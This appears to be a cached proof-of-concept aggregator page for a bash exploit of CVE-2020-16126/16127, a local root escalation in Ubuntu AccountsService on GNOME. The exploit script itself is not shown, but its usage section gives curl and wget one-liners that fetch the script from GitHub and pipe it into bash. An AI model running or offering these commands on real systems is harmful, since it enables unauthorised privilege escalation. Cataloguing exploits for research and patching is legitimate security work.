CVE-2020-16126 PoC — Ubuntu AccountsService 安全漏洞

Source

https://github.com/zev3n/Ubuntu-Gnome-privilege-escalation

Associated Vulnerability

Title:Ubuntu AccountsService 安全漏洞 (CVE-2020-16126)
Description:Ubuntu AccountsService是个人开发者的一款用于在Linux上管理账户的软件。该软件提供对帐户的查询和操作功能，另外提供一组基于useradd、usermod等命令的API。 AccountsService Privilege Drop 存在安全漏洞，该漏洞可触发致命错误，进而导致触发拒绝服务。

Description

A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.Ubuntu 16.04-20.04 LTS本地提权漏洞利用脚本。要求拥有Gnome图形化环境。

Readme

# Ubuntu-Gnome-privilege-escalation
A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.

一个可以方便实现Ubuntu本地提权的bash脚本（利用CVE-2020-16126/CVE-2020-16127漏洞），要求处于Gnome环境。

## Affect version
Ubuntu 20.04.1\20.10\18.04\16.04 LTS and so on

## Usage
`curl https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash`

or (If you have No permissions to install 'curl',you could try...)

`wget -q -O - --no-check-certificate https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash`

## Demonstration
TODO

## Reference
https://securitylab.github.com/advisories/GHSL-2020-187-accountsservice-drop-privs-DOS

File Snapshot


 [4.0K]  /data/pocs/c9797f880e04d9951b6b9ef32d6926b484a62334
├── [ 526]  CVE-2020-1612[6_7]_exploit.sh
├── [1.0K]  LICENSE
└── [ 813]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!